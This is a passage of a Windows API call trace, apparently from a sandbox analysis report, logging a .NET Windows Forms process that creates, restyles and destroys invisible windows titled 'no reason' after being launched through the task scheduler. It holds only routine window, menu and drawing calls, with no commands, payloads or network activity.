hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.655] GetSystemMetrics (nIndex=42) returned 0 [0131.655] GetWindowTextW (in: hWnd=0x1015a, lpString=0x2eec74, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.655] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xd, wParam=0xa, lParam=0x2eec74) returned 0x9 [0131.655] GetWindowLongW (hWnd=0x1015a, nIndex=-16) returned 114229248 [0131.655] GetWindowLongW (hWnd=0x1015a, nIndex=-20) returned 328064 [0131.655] SetWindowLongW (hWnd=0x1015a, nIndex=-16, dwNewLong=47120384) returned 114229248 [0131.655] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x7c, wParam=0xfffffff0, lParam=0x2eecd0) returned 0x0 [0131.655] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x7d, wParam=0xfffffff0, lParam=0x2eecd0) returned 0x0 [0131.655] SetWindowLongW (hWnd=0x1015a, nIndex=-20, dwNewLong=327808) returned 328064 [0131.655] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x7c, wParam=0xffffffec, lParam=0x2eecd0) returned 0x0 [0131.655] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x7d, wParam=0xffffffec, lParam=0x2eecd0) returned 0x0 [0131.656] SetWindowPos (hWnd=0x1015a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0131.656] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x46, wParam=0x0, lParam=0x2eecf0) returned 0x0 [0131.656] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x83, wParam=0x1, lParam=0x2eecc8) returned 0x0 [0131.657] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x2eeaa0 | out: lpwndpl=0x2eeaa0) returned 1 [0131.657] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x47, wParam=0x0, lParam=0x2eecf0) returned 0x0 [0131.657] GetClientRect (in: hWnd=0x1015a, lpRect=0x2eea50 | out: lpRect=0x2eea50) returned 1 [0131.657] GetWindowRect (in: hWnd=0x1015a, lpRect=0x2eea50 | out: lpRect=0x2eea50) returned 1 [0131.658] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x83, wParam=0x1, lParam=0x2ee8d4) returned 0x0 [0131.658] RedrawWindow (hWnd=0x1015a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0131.658] GetSystemMenu (hWnd=0x1015a, bRevert=0) returned 0x1015d [0131.658] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x2eed28 | out: lpwndpl=0x2eed28) returned 1 [0131.658] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0131.658] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0131.658] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0131.658] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0131.658] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0131.658] ShowWindow (hWnd=0x1015a, nCmdShow=5) [0131.658] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0131.659] GetWindowTextLengthW (hWnd=0x1015a) returned 9 [0131.659] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.659] GetSystemMetrics (nIndex=42) returned 0 [0131.659] GetWindowTextW (in: hWnd=0x1015a, lpString=0x2ee998, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.659] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xd, wParam=0xa, lParam=0x2ee998) returned 0x9 [0131.669] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x745d0000 [0131.669] GetWindowLongW (hWnd=0x1015a, nIndex=-16) returned 114229248 [0131.669] GetWindowTextLengthW (hWnd=0x1015a) returned 9 [0131.669] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.669] GetSystemMetrics (nIndex=42) returned 0 [0131.669] GetWindowTextW (in: hWnd=0x1015a, lpString=0x2ee898, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.669] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xd, wParam=0xa, lParam=0x2ee898) returned 0x9 [0131.669] GetWindowTextLengthW (hWnd=0x1015a) returned 9 [0131.669] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.669] GetSystemMetrics (nIndex=42) returned 0 [0131.669] GetWindowTextW (in: hWnd=0x1015a, lpString=0x2ee898, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.669] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xd, wParam=0xa, lParam=0x2ee898) returned 0x9 [0131.669] GetWindowLongW (hWnd=0x1015a, nIndex=-16) returned 114229248 [0131.669] GetWindowLongW (hWnd=0x1015a, nIndex=-20) returned 328064 [0131.669] SetWindowLongW (hWnd=0x1015a, nIndex=-16, dwNewLong=315555840) returned 114229248 [0131.669] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x7c, wParam=0xfffffff0, lParam=0x2ee8f4) returned 0x0 [0131.669] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x7d, wParam=0xfffffff0, lParam=0x2ee8f4) returned 0x0 [0131.670] SetWindowLongW (hWnd=0x1015a, nIndex=-20, dwNewLong=852096) returned 328064 [0131.670] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x7c, wParam=0xffffffec, lParam=0x2ee8f4) returned 0x0 [0131.677] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x7d, wParam=0xffffffec, lParam=0x2ee8f4) returned 0x0 [0131.677] SetWindowPos (hWnd=0x1015a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0131.677] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x46, wParam=0x0, lParam=0x2ee914) returned 0x0 [0131.677] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x83, wParam=0x1, lParam=0x2ee8ec) returned 0x0 [0131.678] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x2ee6c4 | out: lpwndpl=0x2ee6c4) returned 1 [0131.678] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x47, wParam=0x0, lParam=0x2ee914) returned 0x0 [0131.678] GetClientRect (in: hWnd=0x1015a, lpRect=0x2ee674 | out: lpRect=0x2ee674) returned 1 [0131.678] GetWindowRect (in: hWnd=0x1015a, lpRect=0x2ee674 | out: lpRect=0x2ee674) returned 1 [0131.678] RedrawWindow (hWnd=0x1015a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0131.678] GetSystemMenu (hWnd=0x1015a, bRevert=0) returned 0x1015d [0131.678] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x2ee94c | out: lpwndpl=0x2ee94c) returned 1 [0131.678] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0131.678] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0131.678] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0131.678] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0131.678] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0131.682] SetLayeredWindowAttributes (hwnd=0x1015a, crKey=0x0, bAlpha=0x0, dwFlags=0x2) returned 1 [0131.686] GetCurrentThreadId () returned 0x6bc [0131.691] EnumThreadWindows (dwThreadId=0x6bc, lpfn=0x49e0916, lParam=0x1015a) returned 1 [0131.715] GetWindowLongW (hWnd=0x1015e, nIndex=-8) returned 0 [0131.715] GetWindowLongW (hWnd=0x1015a, nIndex=-8) returned 0 [0131.715] GetWindowLongW (hWnd=0x1015c, nIndex=-8) returned 65882 [0131.740] SetWindowLongW (hWnd=0x1015c, nIndex=-8, dwNewLong=0) returned 65882 [0131.742] GetParent (hWnd=0x1015a) returned 0x0 [0131.742] GetWindowLongW (hWnd=0x1015a, nIndex=-20) returned 852352 [0131.743] DestroyWindow (hWnd=0x1015a) returned 1 [0131.743] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0131.743] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x46, wParam=0x0, lParam=0x2ee850) returned 0x0 [0131.745] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x2ee600 | out: lpwndpl=0x2ee600) returned 1 [0131.745] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x47, wParam=0x0, lParam=0x2ee850) returned 0x0 [0131.745] GetClientRect (in: hWnd=0x1015a, lpRect=0x2ee5b0 | out: lpRect=0x2ee5b0) returned 1 [0131.745] GetWindowRect (in: hWnd=0x1015a, lpRect=0x2ee5b0 | out: lpRect=0x2ee5b0) returned 1 [0131.748] GetWindowTextLengthW (hWnd=0x1015a) returned 9 [0131.748] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.748] GetSystemMetrics (nIndex=42) returned 0 [0131.748] GetWindowTextW (in: hWnd=0x1015a, lpString=0x2ee4d4, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.748] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xd, wParam=0xa, lParam=0x2ee4d4) returned 0x9 [0131.749] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0131.749] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0131.752] GetCurrentActCtx (in: lphActCtx=0x2ee8ac | out: lphActCtx=0x2ee8ac*=0x749794) returned 1 [0131.752] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x745d0000 [0131.752] GetModuleHandleW (lpModuleName=0x0) returned 0xde0000 [0131.752] CreateWindowExW (dwExStyle=0x90080, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName="no reason", dwStyle=0x2cf0000, X=150, Y=150, nWidth=164, nHeight=91, hWndParent=0x0, hMenu=0x0, hInstance=0xde0000, lpParam=0x0) returned 0x10160 [0131.752] SetWindowLongW (hWnd=0x10160, nIndex=-4, dwNewLong=2005935581) returned 77465638 [0131.752] GetWindowLongW (hWnd=0x10160, nIndex=-4) returned 2005935581 [0131.752] SetWindowLongW (hWnd=0x10160, nIndex=-4, dwNewLong=77465918) returned 2005935581 [0131.752] GetWindowLongW (hWnd=0x10160, nIndex=-4) returned 77465918 [0131.752] GetWindowLongW (hWnd=0x10160, nIndex=-16) returned 114229248 [0131.753] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x81, wParam=0x0, lParam=0x2ee340) returned 0x1 [0131.753] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x83, wParam=0x0, lParam=0x2ee32c) returned 0x0 [0131.753] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x1, wParam=0x0, lParam=0x2ee340) returned 0x0 [0131.753] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee078 | out: lpRect=0x2ee078) returned 1 [0131.753] GetWindowRect (in: hWnd=0x10160, lpRect=0x2ee078 | out: lpRect=0x2ee078) returned 1 [0131.753] SetWindowTextW (hWnd=0x10160, lpString="no reason") returned 1 [0131.753] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xc, wParam=0x0, lParam=0x222ccdc) returned 0x1 [0131.753] SetLayeredWindowAttributes (hwnd=0x10160, crKey=0x0, bAlpha=0x0, dwFlags=0x2) returned 1 [0131.754] GetStartupInfoW (in: lpStartupInfo=0x222cfb4 | out: lpStartupInfo=0x222cfb4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0131.754] GetParent (hWnd=0x10160) returned 0x0 [0131.755] GetStockObject (i=5) returned 0x1900015 [0131.755] GetModuleHandleW (lpModuleName=0x0) returned 0xde0000 [0131.755] CoTaskMemAlloc (cb=0x5c) returned 0x74c928 [0131.755] RegisterClassW (lpWndClass=0x2ee78c) returned 0xc125 [0131.755] CoTaskMemFree (pv=0x74c928) [0131.755] GetModuleHandleW (lpModuleName=0x0) returned 0xde0000 [0131.755] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xde0000, lpParam=0x0) returned 0x10162 [0131.755] SetWindowLongW (hWnd=0x10162, nIndex=-4, dwNewLong=2005935581) returned 77465958 [0131.755] GetWindowLongW (hWnd=0x10162, nIndex=-4) returned 2005935581 [0131.756] SetWindowLongW (hWnd=0x10162, nIndex=-4, dwNewLong=77465998) returned 2005935581 [0131.756] GetWindowLongW (hWnd=0x10162, nIndex=-4) returned 77465998 [0131.756] GetWindowLongW (hWnd=0x10162, nIndex=-16) returned 79691776 [0131.757] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10162, Msg=0x24, wParam=0x0, lParam=0x2ee374) returned 0x0 [0131.757] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10162, Msg=0x81, wParam=0x0, lParam=0x2ee368) returned 0x1 [0131.757] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10162, Msg=0x83, wParam=0x0, lParam=0x2ee354) returned 0x0 [0131.757] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10162, Msg=0x1, wParam=0x0, lParam=0x2ee368) returned 0x0 [0131.757] SetWindowLongW (hWnd=0x10160, nIndex=-8, dwNewLong=65890) returned 0 [0131.757] SendMessageW (hWnd=0x10160, Msg=0x80, wParam=0x0, lParam=0x10155) returned 0x0 [0131.757] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x80, wParam=0x0, lParam=0x10155) returned 0x0 [0131.758] SendMessageW (hWnd=0x10160, Msg=0x80, wParam=0x1, lParam=0x6010d) returned 0x0 [0131.758] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x80, wParam=0x1, lParam=0x6010d) returned 0x0 [0131.758] GetSystemMenu (hWnd=0x10160, bRevert=0) returned 0x2015d [0131.758] GetWindowPlacement (in: hWnd=0x10160, lpwndpl=0x2ee8bc | out: lpwndpl=0x2ee8bc) returned 1 [0131.758] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0131.758] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0131.758] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0131.758] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0131.758] EnableMenuItem (hMenu=0x2015d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0131.758] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee900 | out: lpRect=0x2ee900) returned 1 [0131.758] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee860 | out: lpRect=0x2ee860) returned 1 [0131.758] GetWindowRect (in: hWnd=0x10160, lpRect=0x2ee860 | out: lpRect=0x2ee860) returned 1 [0131.759] SetWindowPos (hWnd=0x10160, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x57) returned 1 [0131.759] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x46, wParam=0x0, lParam=0x2ee7c8) returned 0x0 [0131.761] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0131.762] GetWindowPlacement (in: hWnd=0x10160, lpwndpl=0x2ee590 | out: lpwndpl=0x2ee590) returned 1 [0131.762] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee53c | out: lpRect=0x2ee53c) returned 1 [0131.762] GetWindowTextLengthW (hWnd=0x10160) returned 9 [0131.762] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.762] GetSystemMetrics (nIndex=42) returned 0 [0131.762] GetWindowTextW (in: hWnd=0x10160, lpString=0x2ee400, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.762] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xd, wParam=0xa, lParam=0x2ee400) returned 0x9 [0131.762] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee444 | out: lpRect=0x2ee444) returned 1 [0131.763] GetSysColor (nIndex=10) returned 0xb4b4b4 [0131.763] GetSysColor (nIndex=2) returned 0xd1b499 [0131.763] GetSysColor (nIndex=9) returned 0x0 [0131.763] GetSysColor (nIndex=12) returned 0xababab [0131.763] GetSysColor (nIndex=15) returned 0xf0f0f0 [0131.763] GetSysColor (nIndex=20) returned 0xffffff [0131.763] GetSysColor (nIndex=16) returned 0xa0a0a0 [0131.763] GetSysColor (nIndex=15) returned 0xf0f0f0 [0131.763] GetSysColor (nIndex=16) returned 0xa0a0a0 [0131.763] GetSysColor (nIndex=21) returned 0x696969 [0131.763] GetSysColor (nIndex=22) returned 0xe3e3e3 [0131.763] GetSysColor (nIndex=20) returned 0xffffff [0131.763] GetSysColor (nIndex=18) returned 0x0 [0131.763] GetSysColor (nIndex=1) returned 0x0 [0131.764] GetSysColor (nIndex=27) returned 0xead1b9 [0131.764] GetSysColor (nIndex=28) returned 0xf2e4d7 [0131.764] GetSysColor (nIndex=17) returned 0x6d6d6d [0131.764] GetSysColor (nIndex=13) returned 0xff9933 [0131.764] GetSysColor (nIndex=14) returned 0xffffff [0131.764] GetSysColor (nIndex=26) returned 0xcc6600 [0131.764] GetSysColor (nIndex=11) returned 0xfcf7f4 [0131.764] GetSysColor (nIndex=3) returned 0xdbcdbf [0131.764] GetSysColor (nIndex=19) returned 0x544e43 [0131.764] GetSysColor (nIndex=24) returned 0xe1ffff [0131.764] GetSysColor (nIndex=23) returned 0x0 [0131.764] GetSysColor (nIndex=4) returned 0xf0f0f0 [0131.764] GetSysColor (nIndex=30) returned 0xf0f0f0 [0131.764] GetSysColor (nIndex=29) returned 0xff9933 [0131.764] GetSysColor (nIndex=7) returned 0x0 [0131.764] GetSysColor (nIndex=0) returned 0xc8c8c8 [0131.764] GetSysColor (nIndex=5) returned 0xffffff [0131.764] GetSysColor (nIndex=6) returned 0x646464 [0131.764] GetSysColor (nIndex=8) returned 0x0 [0131.766] GetSystemMetrics (nIndex=80) returned 1 [0131.768] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x49e09b6, dwData=0x0) returned 1 [0131.768] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x2ee0ac | out: lpmi=0x2ee0ac) returned 1 [0131.769] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x30101dc [0131.769] GetDeviceCaps (hdc=0x30101dc, index=12) returned 32 [0131.769] GetDeviceCaps (hdc=0x30101dc, index=14) returned 1 [0131.769] DeleteDC (hdc=0x30101dc) returned 1 [0131.769] GetCurrentObject (hdc=0x290107d6, type=0x1) returned 0x1b00017 [0131.769] GetCurrentObject (hdc=0x290107d6, type=0x2) returned 0x1900010 [0131.769] GetCurrentObject (hdc=0x290107d6, type=0x7) returned 0x60501e4 [0131.769] GetCurrentObject (hdc=0x290107d6, type=0x6) returned 0x18a002e [0131.770] SaveDC (hdc=0x290107d6) returned 1 [0131.770] GetNearestColor (hdc=0x290107d6, color=0xf0f0f0) returned 0xf0f0f0 [0131.771] CreateSolidBrush (color=0xf0f0f0) returned 0x121001df [0131.771] FillRect (hDC=0x290107d6, lprc=0x2ee2e4, hbr=0x121001df) returned 1 [0131.773] DeleteObject (ho=0x121001df) returned 1 [0131.773] RestoreDC (hdc=0x290107d6, nSavedDC=-1) returned 1 [0131.773] GetWindowPlacement (in: hWnd=0x10160, lpwndpl=0x2ee578 | out: lpwndpl=0x2ee578) returned 1 [0131.774] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x47, wParam=0x0, lParam=0x2ee7c8) returned 0x0 [0131.774] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee528 | out: lpRect=0x2ee528) returned 1 [0131.774] GetWindowRect (in: hWnd=0x10160, lpRect=0x2ee528 | out: lpRect=0x2ee528) returned 1 [0131.774] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x83, wParam=0x1, lParam=0x2ee3ac) returned 0x0 [0131.776] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0131.777] GetWindowPlacement (in: hWnd=0x10160, lpwndpl=0x2ee19c | out: lpwndpl=0x2ee19c) returned 1 [0131.777] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee148 | out: lpRect=0x2ee148) returned 1 [0131.777] GetWindowTextLengthW (hWnd=0x10160) returned 9 [0131.777] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.778] GetSystemMetrics (nIndex=42) returned 0 [0131.778] GetWindowTextW (in: hWnd=0x10160, lpString=0x2ee00c, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.778] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xd, wParam=0xa, lParam=0x2ee00c) returned 0x9 [0131.778] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee050 | out: lpRect=0x2ee050) returned 1 [0131.778] GetCurrentObject (hdc=0x5010162, type=0x1) returned 0x1b00017 [0131.778] GetCurrentObject (hdc=0x5010162, type=0x2) returned 0x1900010 [0131.778] GetCurrentObject (hdc=0x5010162, type=0x7) returned 0x60501e4 [0131.778] GetCurrentObject (hdc=0x5010162, type=0x6) returned 0x18a002e [0131.778] SaveDC (hdc=0x5010162) returned 1 [0131.778] GetNearestColor (hdc=0x5010162, color=0xf0f0f0) returned 0xf0f0f0 [0131.778] CreateSolidBrush (color=0xf0f0f0) returned 0x131001df [0131.778] FillRect (hDC=0x5010162, lprc=0x2edef0, hbr=0x131001df) returned 1 [0131.778] DeleteObject (ho=0x131001df) returned 1 [0131.778] RestoreDC (hdc=0x5010162, nSavedDC=-1) returned 1 [0131.778] SetWindowLongW (hWnd=0x10160, nIndex=-8, dwNewLong=65890) returned 65890 [0131.779] SendMessageW (hWnd=0x10162, Msg=0x80, wParam=0x1, lParam=0x6010d) returned 0x0 [0131.779] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10162, Msg=0x80, wParam=0x1, lParam=0x6010d) returned 0x0 [0131.779] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10162, Msg=0xd, wParam=0x104, lParam=0x42dc610) returned 0x0 [0131.779] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10162, Msg=0xd, wParam=0x104, lParam=0x42dc610) returned 0x0 [0131.780] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x745d0000 [0131.780] GetWindowLongW (hWnd=0x10160, nIndex=-16) returned 382664704 [0131.780] GetWindowTextLengthW (hWnd=0x10160) returned 9 [0131.780] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.780] GetSystemMetrics (nIndex=42) returned 0 [0131.780] GetWindowTextW (in: hWnd=0x10160, lpString=0x2ee7f8, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.780] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xd, wParam=0xa, lParam=0x2ee7f8) returned 0x9 [0131.780] GetWindowTextLengthW (hWnd=0x10160) returned 9 [0131.780] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.780] GetSystemMetrics (nIndex=42) returned 0 [0131.780] GetWindowTextW (in: hWnd=0x10160, lpString=0x2ee7f8, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.780] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xd, wParam=0xa, lParam=0x2ee7f8) returned 0x9 [0131.780] GetWindowLongW (hWnd=0x10160, nIndex=-16) returned 382664704 [0131.780] GetWindowLongW (hWnd=0x10160, nIndex=-20) returned 590208 [0131.780] SetWindowLongW (hWnd=0x10160, nIndex=-16, dwNewLong=315555840) returned 382664704 [0131.780] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x7c, wParam=0xfffffff0, lParam=0x2ee854) returned 0x0 [0131.780] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x7d, wParam=0xfffffff0, lParam=0x2ee854) returned 0x0 [0131.781] SetWindowLongW (hWnd=0x10160, nIndex=-20, dwNewLong=589952) returned 590208 [0131.781] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x7c, wParam=0xffffffec, lParam=0x2ee854) returned 0x0 [0131.781] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x7d, wParam=0xffffffec, lParam=0x2ee854) returned 0x0 [0131.781] SetWindowPos (hWnd=0x10160, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0131.781] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x46, wParam=0x0, lParam=0x2ee874) returned 0x0 [0131.781] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x83, wParam=0x1, lParam=0x2ee84c) returned 0x0 [0131.783] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0131.785] GetWindowPlacement (in: hWnd=0x10160, lpwndpl=0x2ee63c | out: lpwndpl=0x2ee63c) returned 1 [0131.785] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee5e8 | out: lpRect=0x2ee5e8) returned 1 [0131.785] GetWindowTextLengthW (hWnd=0x10160) returned 9 [0131.785] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.785] GetSystemMetrics (nIndex=42) returned 0 [0131.785] GetWindowTextW (in: hWnd=0x10160, lpString=0x2ee4ac, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.785] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0xd, wParam=0xa, lParam=0x2ee4ac) returned 0x9 [0131.785] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee4f0 | out: lpRect=0x2ee4f0) returned 1 [0131.785] GetCurrentObject (hdc=0x1401007f, type=0x1) returned 0x1b00017 [0131.785] GetCurrentObject (hdc=0x1401007f, type=0x2) returned 0x1900010 [0131.785] GetCurrentObject (hdc=0x1401007f, type=0x7) returned 0x60501e4 [0131.785] GetCurrentObject (hdc=0x1401007f, type=0x6) returned 0x18a002e [0131.785] SaveDC (hdc=0x1401007f) returned 1 [0131.785] GetNearestColor (hdc=0x1401007f, color=0xf0f0f0) returned 0xf0f0f0 [0131.785] CreateSolidBrush (color=0xf0f0f0) returned 0x141001df [0131.785] FillRect (hDC=0x1401007f, lprc=0x2ee390, hbr=0x141001df) returned 1 [0131.785] DeleteObject (ho=0x141001df) returned 1 [0131.785] RestoreDC (hdc=0x1401007f, nSavedDC=-1) returned 1 [0131.786] GetWindowPlacement (in: hWnd=0x10160, lpwndpl=0x2ee624 | out: lpwndpl=0x2ee624) returned 1 [0131.786] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x10160, Msg=0x47, wParam=0x0, lParam=0x2ee874) returned 0x0 [0131.786] GetClientRect (in: hWnd=0x10160, lpRect=0x2ee5d4 | out: 